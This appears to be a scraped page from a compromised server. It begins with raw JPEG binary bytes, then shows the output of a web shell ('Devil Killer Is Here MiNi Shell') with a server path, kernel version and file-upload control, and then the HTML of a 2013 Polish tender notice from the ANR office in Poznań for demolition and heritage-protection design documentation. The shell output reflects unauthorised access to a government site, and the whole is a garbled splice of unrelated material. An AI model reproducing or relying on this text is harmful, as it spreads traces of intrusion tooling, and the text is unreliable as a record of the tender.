JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/263960-N-2013.html

<p class="kh_header"><b>Poznań: opracowanie dokumentacji projektowo - kosztorysowych - postępowanie nr 016/POZ/88/2013</b><br>
<b>Numer ogłoszenia: 263960 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy , ul. Fredry 12, 61-701 Poznań, woj. wielkopolskie, tel. 061 8560681, faks 061 8515092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowo - kosztorysowych - postępowanie nr 016/POZ/88/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> część 1:

Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego dotyczącej wykonania rozbiórki maszyn i urządzeń, wchodzących w skład środka trwałego o nazwie Urządzenia suszarni nr inw. 430/207/+7, zamontowanych w budynku suszarni Zielonek (nr 101/1/+186, działka nr 38/1) w Jarosławcu. Dokumentacja winna również obejmować kosztorys inwestorski, zawierającego wyliczenie kosztów likwidacji urządzeń suszarni wraz z wyceną materiałów porozbiórkowych i uzyskaniem przez wykonawcę projektu stosownych zezwoleń i uzgodnień właściwych organów (w tym ostatecznych decyzji administracyjnych).


część 2: 

Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego i uzyskaniem stosownych zezwoleń i uzgodnień właściwych organów na wykonanie robót zabezpieczających w budynkach:

- oficyny mieszkalnej w msc. Oporowo, gm. Ostroróg (wpisana do rejestru zabytków pod nr. 2648/A, działka o numerze ewidencyjnym 36/4),

- pałacu w msc. Oporowo, gm. Ostroróg (wpisany do rejestru zabytków pod nr 1431/A, działka o numerze ewidencyjnym 36/4),

- stajni koni wyjazdowych z budynkiem bramnym w msc. Oporowo, gm. Ostroróg (wpisanym do rejestru zabytków pod nr 2648/A, działka o numerze ewidencyjnym 36/4).

Roboty zabezpieczające miałyby polegać między innymi na: zamurowaniu z pozostawieniem wentylacji otworów okiennych i drzwiowych, podstemplowaniu istniejących stropów, rozebraniu uszkodzonego dachu, zgodnie z wymogami Wojewódzkiego Konserwatora Zabytków oraz założeniami projektowymi ujętymi poniżej:

Oficyna mieszkalna:
- zabezpieczenie otworów okiennych i drzwiowych poprzez zamurowaniu z pozostawieniem wentylacji,
	- naprawa pokrycia dachowego,
	- naprawa obróbek blacharskich, wymianie rynien, uszczelnieniu i uzupełnieniu rur spustowych;
	
Pałac:
- usunięcie z poziomu parteru gruzu z zawalonych stropów, 
- podstemplowanie istniejących stropów;

Stajnia koni wyjazdowych z budynkiem bramnym:
- zabezpieczenie odkrytych fragmentów murów przed zawilgoceniem,
- zabezpieczenie otworów okiennych i drzwiowych poprzez zamurowaniu z pozostawieniem wentylacji,
- usunięcie i utylizacja zalegających odpadów na stropie budynku bramnego,
- usunięcie zawalonego fragmentu dachu i zabezpieczenie stropu przed zawilgoceniem.


część 3: 

Opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem funkcji nadzoru autorskiego na rozbiórkę części budynku usytuowanej w kierunku wschodnim od ściany poprzecznej oraz niezbędnych robót zabezpieczających i remontowych w budynku mieszkalnym w msc. Gościejewie nr 7, gm. Bojanowo. 

a) W ramach zamówienia Wykonawca wykona w szczególności:
- inwentaryzację budynku,
- projekty budowlane w zakresie uwzględniającym specyfikę robót budowlanych,
- projekty wykonawcze w zakresie określonym w § 5 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami), zwanego w dalszej części Rozporządzeniem,
- przedmiar robót w zakresie, o którym mowa w § 6 Rozporządzenia,
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski uproszczony sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późn. zm.);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;

c) zakres opracowania dokumentacji :
- na podstawie zatwierdzonej przez PINB w Rawiczu ekspertyzy technicznej budynku,
- oraz inne niezbędne roboty wynikające z oceny stanu technicznego obiektu dokonanego przez   wykonawcę dokumentacji w uzgodnieniu z Zamawiającym;

d) dokumentację należy opracować na podstawie przeprowadzonej wizji lokalnej oraz uzgodnień z osobą uprawnioną do kontaktu w sprawie zamówienia;

e) należy uzyskać stosowne pozwolenia wymagane w ustawie Prawo Budowlane, umożliwiające realizację remontu;

f) komplet dokumentacji obejmuje także załączoną dokumentację w formie elektronicznej w dwóch częściach : 
cz. 1 - dokumentacja projektowa i wykonawcza wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys inwestorski,
cz. 2 -  dokumentacja projektowa i wykonawcza wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys ofertowy;

g) wykonawca  w ramach zamówienia zobowiązany jest do aktualizacji kosztorysu inwestorskiego w okresie 24 miesięcy od dnia odbioru dokumentacji przez zamawiającego;

h) inwestor, w przypadku zaistnienia takiej potrzeby, przekaże Wykonawcy, w terminie 2 dni od chwili złożenia pisemnego zgłoszenia, niezbędne pełnomocnictwa i upoważnienia O/T ANR w Poznaniu, w celu składania oświadczeń woli w imieniu zamawiającego na uzyskanie stosownych pozwoleń i uzgodnień niezbędnych do wykonania zamówienia;

i) wykonana dokumentacja podlega weryfikacji przez zamawiającego zgodnie z umową.


część 4: 

Opracowanie dokumentacji projektowo - kosztorysowej na wykonanie rozbiórki bezodpływowych zbiorników na ścieki wraz z kanalizacją sanitarną w msc. Uzarzewo, gm. Swarzędz dz. nr 38/9, Dobrojewo gm. Ostroróg dz. nr 27/1, 27/16 , Sapowice gm. Stęszew dz. nr 209/3. 

a) W ramach zamówienia Wykonawca wykona:
- projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych,
- przedmiar robót w zakresie o którym mowa w § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami),
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych    
   opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.,05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późniejszymi zmianami);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;

c) zakres opracowania dokumentacji dotyczy:

- rozbiórki podziemnych żelbetowych bezodpływowych zbiorników na ścieki: Uzarzewo - 3 zbiorniki dz. nr 38/9, Dobrojewo - 3 zbiorniki dz. nr 27/1, 27/16 (1szt) dz.nr 27/5 (1szt), dz.nr 27/4, 27/5 (1szt),  Sapowice - 5 zbiorników dz. nr 209/3. Zamawiający zaleca przeprowadzenie wizji lokalnej. Koszty dokonania wizji lokalnej ponosi Wykonawca.
 - rozebranie górnych płyt zbiorników, rozebranie bocznych ścian zbiorników na głębokość ok. 1,0m pod poziom gruntu, wykonanie otworów w dnach zbiorników,
- zasypanie zbiorników piaskiem wraz z dezynfekcją wapnem chlorowanym warstwami co 25cm
- rozbiórki rurociągu kanalizacyjnego doprowadzającego ścieki do zbiorników (w obrębie działek, na których znajdują się zbiorniki - dotyczy: Dobrojewa),
- zabezpieczenia i oznakowania terenu prac rozbiórkowych,
-  przywrócenie terenu do stanu zastanego (zniwelowanie, wyrównanie gruntu, w przypadku uszkodzenia dróg dojazdowych utwardzenie),
-  w części kosztorysowej dokumentacji ujęcie pozycji - geodezja powykonawcza, wywóz i utylizacja odpadów; gruz - oraz inne niezbędne roboty wynikające z oceny (dokonanej przez wykonawcę dokumentacji) stanu technicznego obiektu a umożliwiające prawidłową realizację przedmiotu zamówienia.

część 5: 

Opracowanie dokumentacji projektowo - kosztorysowej na wykonanie rozbiórki komina stalowego w msc. Glinno, Gm. Skoki dz. nr 29/15. 

a) W ramach zamówienia Wykonawca wykona:
- projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych,
- przedmiar robót w zakresie o którym mowa w § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202,poz. 2072 z późniejszymi zmianami),
- informację dotyczącą  bezpieczeństwa i ochrony zdrowia,
- specyfikację techniczną wykonania i odbioru robót budowlanych    
   opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia,
- kosztorys inwestorski sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.,05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późniejszymi zmianami);

b) strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia;
 
c) zakres opracowania dokumentacji dotyczy:

- rozbiórki nieczynnego komina stalowego wolnostojącego przy budynku. Wysokość komina ok. 17,0m (uwaga: przy budynku są dwa kominy - rozbiórce podlega wyższy, nieczynny),
 - rozbiórki betonowej podstawy komina  o wym. 1,7*1,7*0,5 - część nadziemna całość, część podziemna ok.15cm pod poziom gruntu,
- zabezpieczenia i oznakowanie terenu prac rozbiórkowych,
- przywrócenie terenu do stanu zastanego (zniwelowanie, wyrównanie gruntu w przypadku dróg dojazdowych utwardzenie), 
-  w części kosztorysowej dokumentacji ująć należy pozycję dotyczącą wyliczenia (tylko ilości bez wartości) materiałów odpadowych tj złom stalowy, gruz stających się własnością wykonawcy robót rozbiórkowych oraz pozycję geodezja powykonawcza,  
-  oraz inne niezbędne roboty wynikające z oceny (dokonanej przez wykonawcę dokumentacji) stanu technicznego obiektu a umożliwiające prawidłową realizację przedmiotu zamówienia;

d) opracowanie dokumentacji należy poprzedzić :
- uzgodnieniami z osobą upoważnioną do kontaktu w sprawie zamówienia, 
- przeprowadzenie wizji lokalnej. Koszty dokonania wizji lokalnej ponosi Wykonawca;

e) należy uzyskać wszystkie wymagane prawomocne decyzje, pozwolenia, zgody umożliwiające realizację zadania;

f) komplet dokumentacji obejmuje także załączoną dokumentację w formie  elektronicznej w dwóch częściach : 
cz. 1 - dokumentacja projektowa wraz ze szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys inwestorski (osobna płyta),
cz. 2 -  dokumentacja projektowa wraz z szczegółową  specyfikacją techniczną wykonania i odbioru robót + przedmiar + kosztorys  ślepy (osobna płyta);

g) wykonawca  w ramach zamówienia zobowiązany jest do aktualizacji kosztorysu inwestorskiego w okresie 24 miesięcy od dnia odbioru dokumentacji przez  zamawiającego;

h) inwestor, w przypadku zaistnienia takiej potrzeby, przekaże Wykonawcy, w terminie 2 dni od chwili złożenia pisemnego zgłoszenia, niezbędne pełnomocnictwa i upoważnienia O/T ANR w Poznaniu, w celu składania oświadczeń woli w imieniu zamawiającego na uzyskanie stosownych pozwoleń i uzgodnień niezbędnych do wykonania zamówienia;

i) wykonana dokumentacja podlega weryfikacji przez zamawiającego. Po dokonaniu weryfikacji i usunięciu ewentualnych braków przez wykonawcę sporządzony zostanie protokół odbioru..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania, Zamawiający uzna wykonawców, którzy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena tego warunku dokonywana będzie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, dotyczący posiadania wiedzy i doświadczenia, Zamawiający uzna wykonawców, którzy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

a)  należycie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, co najmniej 3 dokumentacje projektowo - kosztorysowe obejmujące rozbiórkę obiektów budowlanych oraz załączą dowody, że usługi te zostały wykonane należycie lub są wykonywane należycie (dotyczy części 1),


b) należycie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, co najmniej 3 dokumentacje projektowo - kosztorysowe dotyczące obiektów wpisanych do rejestru zabytków oraz załączą dowody, że usługi te zostały wykonane należycie lub są wykonywane należycie (dotyczy części 2)

Ocena spełnienia tego warunku, w zakresie części 2 zamówienia, dokonywana będzie na podstawie oświadczenia o spelnieniu warunków udziału w postępowaniu, załączonego do oferty wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług oraz dowodów, że w/w usługi są wykonywane należycie lub zostały wykonane należycie.

W przypadku złożenia oferty zarówno na część 1 i 2 Wykonawcy muszą wykazać w sumie 6 wykonanych usług.

W przypadku części 3, 4 i 5 ocena spełnienia tego warunku dokonywana będzie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, dotyczący dysponowania potencjałem technicznym, Zamawiający uzna wykonawców, którzy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena tego warunku dokonywana będzie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający uzna wykonawców, którzy wykażą że:

a) dysponują co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno - budowlanej bez ograniczeń wymagane przepisami ustawy Prawo budowlane i umożliwiające zrealizowanie przedmiotowego zadania oraz są członkami PIIB (dotyczy części 1, 2, 3, 4, 5).  

Ocena tego warunku dokonywana będzie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu, wykazu osób oraz oświadczenia o posiadaniu uprawnień przez osoby, które będą brały udział w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, dotyczący sytuacji ekonomicznej i finansowej, Zamawiający uzna wykonawców, którzy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu. Ocena tego warunku dokonywana będzie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku złożenia przez wykonawców oferty wspólnej do oferty winny być ponadto załączone: - pełnomocnictwo regulujące współpracę podmiotów występujących wspólnie (np. umowa konsorcjum, jeżeli takie pełnomocnictwo wynika z tej umowy) złożone w oryginale, zawierające wskazanie: a)postępowania o zamówienie publiczne, którego dotyczy, b)wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, c)ustanowionego pełnomocnika oraz zakresu jego umocowania. Każdy z wykonawców składających ofertę wspólną musi wraz z ofertą złożyć listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informację, że nie należy do tej samej grupy kapitałowej. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się aktualnego odpisu z rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Jeżeli wykonawca, wykazując spełnienie warunków udziału w postępowaniu, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy, Zamawiający wymaga przedstawienia pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
